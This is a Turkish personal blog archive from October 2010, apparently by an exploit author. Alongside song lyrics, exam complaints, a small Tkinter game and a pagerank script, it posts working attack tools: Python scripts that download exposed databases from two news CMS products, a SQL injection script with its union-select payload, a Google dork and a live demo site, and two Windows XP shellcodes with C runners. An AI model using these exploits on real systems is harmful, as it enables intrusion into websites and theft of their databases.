"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

29 Ekim 2010 Cuma

yildirimordulari.org / Dr.Ly0n

vay vay vay doktor kardeşim süprizim var dedi ve bombayı patlattı :) yildirimordulari.org yakında online ama hack sitesi olarak değil farklı projelerimiz var bakalım ya nasip, kardeşim teşekkürler, yılların rüyasını gerçekleştirdin doktor ;)

/Ekip: Dr.Ly0n, LifeSteaLeR, ZoRLu

26 Ekim 2010 Salı

str0ke a son mail / 08.08.2009






konu: Linux version 2.6.28-14-generic (gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4) ) Kernel Memory Disclosure

kabul etmemişti hırt peşine bi resim gönderdim kanıt olarak, dediki tamamda yetki aşımı vs yok bu açık sayılmaz falan :D simdi resme baktım da linux yakıyor aga tema falan :D hey gidi günler hey gidi str0ke

25 Ekim 2010 Pazartesi

Numan Hadi - Dönmüyor

numan hadi dönmüyor | izlesene.com



dönmüyor dönmüyor sevdiğim dönmüyor

gitgide gelmiyor, sevdalım dönmüyor

dönmüyor dönmüyor sevdiğim dönmüyor

gitgide gelmiyor, sevdalım dönmüyor


yalnızım yalnızım bir bahtı karayım

bir kıza sevdalı yaralı adamım

23 Ekim 2010 Cumartesi

son bir hafta

haftaya pazar büyük gün(!) sınav giriş belgesi ulaştı elime :) dua edin arkadaşlar bu son şansımız. sınavın 31 ekimde olması da başka bir olay, tarihe bak a.q :D

11 Ekim 2010 Pazartesi

Özgür Akkuş / Gökhan Türkmen - Kayıp Şehir

dehşet bişey dinleyin pişman olmazsınız...



Ben gönlümü bir kere sana verdim
Ömrümü uğruna heder ettim
Son durak, liman seni seçtim
Vazgeçemiyorum..

Gururu, kibiri evde bıraktım
En yalın halimle sana aktım
Gözlerime bir kere ışık yaktın
Vazgeçemiyorum..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..

Gözlerim doluyor gecelerde
En yalın en küçük hecelerde
Dilimin ucuna geldiğinde
Söyleyemiyorum..
Zaman öyle akıp gidiyorken
Sana deli yüreğim biliyorken
Şeytan diyor ki dök dilinden
Söyleyemiyorum..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..

Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..

8 Ekim 2010 Cuma

mal bunlar :))



biraz önce exploit gönderdim explo(it)-db.com a mal bunlar a.q maili ZRL BGRHN diye almıştım direk o ada post edilmiş :)) ZRL BGRHN kim a.q yazmısım kocaman Author: ZoRLu diye :S vay a.q biz de kime gönderiyoruz exp falan bunlar bildiğin mal :D nerdesin str0ke :((

7 Ekim 2010 Perşembe

Nobel Akademi KPSS Eğitim Bilimleri Yaprak Test / Soru Bankası


kitabı çözünce eğitim sorularını fullerim düşüncesiyle alacaksanız almayın :P / onun formülü belli 10 bin dolarmış :S / piç kuruları
kitab konu çalışıp hemen peşine sorusunu çözerseniz pekiştirir çok salakça sorularda var ( buna sık sık rastlıyoruz ) çok düşündürücü güzel sorularda var ( buna nadir rastlıyoruz ) kötünün iyisi denebilir

Python Modül Downloader

python 2.5 / 2.6 için çok güzel bir uygulama ne diyor yeni nesil çok cix bi düşünce :PP

python 2.6 download:

http://www.python.org/ftp/python/2.6/python-2.6.msi

modül download for 2.6:

http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c11.win32-py2.6.exe

python 2.5 download:

http://www.python.org/ftp/python/2.5/python-2.5.msi

modül download for 2.5:

http://pypi.python.org/packages/2.5/s/setuptools/setuptools-0.6c11.win32-py2.5.exe

kurulum bittikten sonra pythonun kurulu olduğu dizine geliyoruz ben kendimden örnekle uyguluycam:



cd \python26\Scripts

easy_install markup /

markup modülün adı siz hangi modülü yüklemek istiyorsanız onu yazıyorsunuz

easy_install ImageTk gibi gibi



modüllere aşağıdaki adresten ulaşabilirsiniz:

http://pypi.python.org/simple/

Toygar Işıklı - Sen eşittir ben



Gün karanlıksa etrafın bulanıksa
Kaderin sana düşmansa benden çok da farklı değilsin
Yağmura saygın sonsuzsa aşka hiç inanmıyorsan
Zorla günleri sayıyorsan aynı kişi bile olabiliriz

Eminim bi gün senle buluşup bişeyler içeceğiz
Hatta belki eskileri anacağız dertleşeceğiz

En sevdiğin şarkı yalansa hayatının filmi hayatsa
Bi de hayatın tümüyle yalansa karşılaşmamız an meselesi
Hayatının kitabı mutluluksa sardunyaları mırıldanıyorsan
Deniz görmeden yaşayamıyorsan sen eşittir ben demektir..

Gün yol almışsa efkârın omzundaysa
Gözyaşın sana düşmansa benden çok da farklı değilsin
Yağmura aşkın sonsuzsa kalbinde saklanıyorsan
Zorla günleri sayıyorsan aynı hüznü bile duyabiliriz

Eminim bi gün senle buluşup bişeyler içeceğiz
Hatta belki eskileri anacağız dertleşeceğiz

En sevdiğin şarkı yalansa hayatının filmi hayatsa
Bi de hayatın tümüyle yalansa karşılaşmamız an meselesi
Hayatının kitabı mutluluksa sardunyaları mırıldanıyorsan
Deniz görmeden yaşayamıyorsan sen eşittir ben demektir

6 Ekim 2010 Çarşamba

Sinek Oyunu / Python - Tkinter

Epeydir Tkinterle uğrasmıyodum unutmusum küçük bi pratik :P
işte kodlamada kullanacağımız sinek:


Ekran Görüntüsü:


Kodlarımız:



#!/usr/bin/env python
#_*_coding:cp1254_*_

from Tkinter import *
import ImageTk, random

cam = Tk()
cam.geometry("400x400")
cam.tk_setPalette("black")
cam.title("Sinekli Bakkal")
cam.resizable(width=FALSE, height=FALSE)

def yakalayalim(event=None):
a = random.randint(0,300)
b = random.randint(0,300)
print a,b
puton.place(x=a,y=b)

resim = ImageTk.PhotoImage(file="sinek.jpg")
puton = Button(image=resim, command=yakalayalim, relief="flat")
puton.place(x=1,y=0)
puton.bind("",yakalayalim)

mainloop()

5 Ekim 2010 Salı

Pagerank ZoRgular





anca iki resim paylaşabildim fazla sorgulama yaptığım için site banladı sanırım :D basit bi kodlama iste ban kalkarsa baska görüntülerde eklerim :) Kullanıma dair diğer açıklamaları okumayı ihmal etmeyin

//Serefsiz Blogspot

blogspot kodları engelliyo isterseniz dosayı indirebilirsiniz

http://www.upload.gen.tr/d.php/s15/8tgvqbii/rank.rar.html


#!/usr/bin/env python
#-*- coding: cp1254 -*-

'''
Proje : Pagerank ZoRgular
Kodlama : ZoRLu
Site : http://z0rlu.blogspot.com
Site : http://inj3ct0r.com
Tarih : 05/10/2010
Sebep : Can Sıkıntısı :/
Dinlediğim Şarkı : http://www.youtube.com/watch?v=6Sa4rLt-WJA
Turkçe Karakter : Sorunun Çözümü için cmd penceresinde sağ tıkla > Özellikler > Yazı Tipi > Lucida Console Seç
Uyarı : Fazla Sorgulama Yapmayın Banlıyo Pezevenkler :))
Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
Python Version : 2.7 / http://python.org/ftp/python/2.7/python-2.7.msi
Lakirdi : Sınavınında ...
'''

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
import os
os.system(['clear','cls'][1])
os.system('color 2')
os.system('chcp 1254')
print "\t_______________________________________________________________"
print " "
print " \t\tPagerank ZoRgular "
print " "
print " \t\tKullanım: "
print " "
print " \t\tpython %s siteniz.com" % os.path.basename(sys.argv[0])
print " "
print "\t_______________________________________________________________"
sys.exit(1)


sitemiz = sys.argv[1]
pagerankgentr = "http://www.pagerank.gen.tr"
path = "/@pagerank/"
url = pagerankgentr + path + sitemiz


print "\nZoRgulanıyor..."
time.sleep(1)

print "\nSite: %s"% os.path.basename(sys.argv[1]);
time.sleep(2)

try:
Pagerank = urllib2.urlopen(url).read()
Pagerankcek = re.findall(r"

(.*)([0-9a-fA-F])(.*)

", Pagerank)
if len(Pagerankcek) > 0:
print "\nPagerank Değeriniz: " + Pagerankcek[0][0] + Pagerankcek[0][1]
time.sleep(1)

else:
print "\nPagerank Değeriniz Sorgulanamadı!"
sys.exit(1)



except urllib2.HTTPError:
print "Server Meşgul!"
sys.exit(1)

try:
Aciklama = urllib2.urlopen(url).read()
Aciklamacek = re.findall(r"Pagerank Değerinizin Açıklaması:
(.*)([0-9a-fA-F])(.*)", Aciklama)
if len(Aciklamacek) > 0:
print "\nPagerank Açiklaması: " + Aciklamacek[0][0] + Aciklamacek[0][1] + Aciklamacek[0][2]
time.sleep(1)


else:
print "\nAçıklama Sorgulaması Sorgulanamadı!"



except urllib2.HTTPError:
print "Server Meşgul!"


try:
Resim = urllib2.urlopen(url).read()
Resimcek = re.findall(r"
if len(Resimcek) > 0:
print "\nKayitli Resim: \n\n" + Resimcek[0][0] + Resimcek[0][1] + Resimcek[0][2]
time.sleep(2)

print "\nZoRgulama Tamamlandı!"
else:
print "\nKayıtlı Resim Sorgulanamadı!"


except urllib2.HTTPError:
print "Server Meşgul!"


meyra - cemil demirbakan - beni sensiz düşünme

meyra & cemil demirbakan - beni sensiz düşünme | izlesene.com




Asıl benim canım yanmış
Nasıl da tadım kaçmış
Takıldım masum yüzüne
Akıl ver çare nerde

Meğer benim bildiklerim
Kağıttan duvarlarmış
Düştüm bir gizin eşine
Malesef çare sende

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama güven son sözüme
Beni sensiz düşünme

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama inan son sözüme
Beni sensiz düşünme
Seni bensiz düşünme

Asıl benim canım yanmış
Nasıl da tadım kaçmış
Takıldım masum yüzüne
Akıl ver çare nerde

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama güven son sözüme
Beni sensiz düşünme

İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama inan son sözüme
Beni sensiz düşünme
Seni bensiz hiç düşünme...

Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)

http://inj3ct0r.com/exploits/14356
http://packetstormsecurity.org/1010-exploits/cilemhaber-disclose.txt
http://www.exploit-db.com/exploits/15199



#!/usr/bin/env python
#-*- coding:cp1254 -*-

'''
# Title : Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)
# Down. Script : http://www.aspindir.com/indir.asp?id=3287&sIslem=%DDndir
# Proof : http://img718.imageshack.us/img718/7993/cilem.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 04/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Nasil Kullanabilirsiniz Bu Acigi ? Oda Bende Kalsin :))
'''

import sys, urllib2, re, os, time

def indiriyoruz(url):

import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()

if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

''' link kontrol 1 '''

add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "db/cilemhaber.mdb"
url2 = sitemiz + vulnfile

''' link kontrol 2 '''

try:
adreskontrol = urllib2.urlopen(url2).read()

if len(adreskontrol) > 0:

print "\nGood Job Bro!"

except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)


''' dosya indiriliyor '''

if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'


Abhimanyu Infotech (show_news.php id) SQL Injection Exploit

http://inj3ct0r.com/exploits/14357
http://packetstormsecurity.org/1010-exploits/abhimanyu-sql.txt



#!/usr/bin/env python
#-*- coding:utf-8 -*-

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : Abhimanyu Infotech (show_news.php id) SQL Injection Exploit (.py)
# Demo : http://soumyampl.com/index1.php?file=show_news.php&id=2 // has a lfi too :))
# Proof : http://img715.imageshack.us/img715/297/sqlo.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 04/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Gecmiyorum Zaman a.k :/
# Dork : intext:"Designed" "Abhimanyu Infotech"
'''

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Abhimanyu Infotech SQL Inj Exploit (.py) "
print " "
print " Coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "show_news.php"
sql = "?id=0000+union+select+1,2,3,concat(0x3a3a3a,database(),0x3a3a3a)"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "database(): " + aliver[0][0] + aliver[0][1] +aliver[0][2]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"

2 Ekim 2010 Cumartesi

seyfi doğanay - bul beni



ben yaralı ceylanım dağlarda
avcı olup düş peşime bul beni
kipriğini şu gönlüme ok eyle
sol yanımın üzerinden vur beni

alacaksan al canımı ses etmem
kıydın diye beni sana küs etmem
ben seversem kolay kolay pes etmem
boynum sana kıldan ince vur beni

bu nasıl bir sevda geldi başıma
aşılmaz dağlara saldın yar beni
gecemi gündüze kattım yollarda
kurda kuşa yem olmadan bul beni

alacaksan al canımı ses etmem
kıydın diye beni sana küs etmem
ben seversem kolay kolay pes etmem
boynum sana kıldan ince vur beni

Seyfi Doğanay

Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)

http://www.exploit-db.com/exploits/15183/



#!/usr/bin/env python
#-*- coding:cp1254 -*-

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)
# Desc. : its not Database
# Down. Script : http://www.scriptci.com/modules.php?name=Downloads&d_op=getit&lid=475
# Proof : http://img822.imageshack.us/img822/3568/filedisc.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 02/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Okudugumuz icin Cezalandiran Sisteme Sarkitiyim / 3227 Orrospu Cocugu Yakinda Sinemalarda :P
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=RV7Wj0KKVxo
'''

import sys, urllib2, re, os, time

def indiriyoruz(url):

import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()

if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Bka Haber v1.0 (Tr) File Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

''' link kontrol 1 '''

add = "http://"
add2 = "/"
sitemiz = sys.argv[1]

if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "db/haber.mdb"
url2 = sitemiz + vulnfile

''' link kontrol 2 '''

try:
adreskontrol = urllib2.urlopen(url2).read()

if len(adreskontrol) > 0:

print "\nGood Job Bro!"

except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)


''' dosya indiriliyor '''

if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'

1 Ekim 2010 Cuma

explo(it)-db.com

gönderiyorum maili post ediliyor bakıyorum onaylanmısta sonra hoba silindi hemen gönderdim bi mail dedim malmısınız olum bu ne gevşeklik :PP şakası bir yana gönderdiğim exploit, shellcode yada buglardan bazılarını tınmadılar bazılarını da post edip sonra sildiler 1,3,5 derken baktım böyle olmuyor gönderdim bir mail:

soru:

dedim nerde hata yapıyorum söyleyin biliyim önce yayınlayıp sonra silmenize sebep nedir lütfen yanlışımı bildirin düzeltmek istiyorum

el cevap:

seni şaşırttığımız için üzgünüz, herhangi bir hatanız yok biz bind shell, add admin account shell vs vs tarzında shellcode istiyoruz


// bununda tek bir açıklaması var am buldunuz kıllısını istiyorsunuz :/

// of str0ke nerdesin yav :((

win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes

http://inj3ct0r.com/exploits/14298
http://packetstormsecurity.org/shellcode/win32cmd-shellcode.txt
http://shell-storm.org/shellcode/files/shellcode-710.php


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
# Proof : http://img36.imageshack.us/img36/1183/cmdm.jpg
# Plat. : win32 / windows
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 01/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Okudugumuz icin Cezalandiran Sistemin amina koyim / Kpss Anani ...
# Lakirdi : Son 31 Gun


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
"\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
"\x65\x20\x2f\x63\x20\x63\x6d\x64";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();



return 0;
}

win32/xp sp3 (Tr) About Box Shellcode 77 bytes

http://inj3ct0r.com/exploits/14270
http://packetstormsecurity.org/shellcode/winabout-shellcode.txt
http://www.exploit-db.com/exploits/15170/





1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# Title : win32/xp sp3 (Tr) About Box Shellcode 77 bytes
# Proof : http://img707.imageshack.us/img707/2276/infoja.jpg
# Plat. : win32
# Author : ZoRLu / http://inj3ct0r.com/Author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 30/09/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Genclik Gidin Kahvede Batak, Pispirik, Okey vs Oynayin ama Okumayin amina koyim / Kpss Anani ...
# Lakirdi : Son 32 Gun


#include
#include
#include

int main(){

unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x2b\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x52\x55\x4e\x44\x4c\x4c"
"\x33\x32\x2e\x45\x58\x45\x20\x73\x68\x65\x6c\x6c\x33\x32\x2c\x53\x68"
"\x65\x6c\x6c\x41\x62\x6f\x75\x74\x41";

printf("Size = %d bytes\n", strlen(shellcode));

((void (*)())shellcode)();



return 0;
}


# Inj3ct0r.com [2010-09-30]
 
Dizi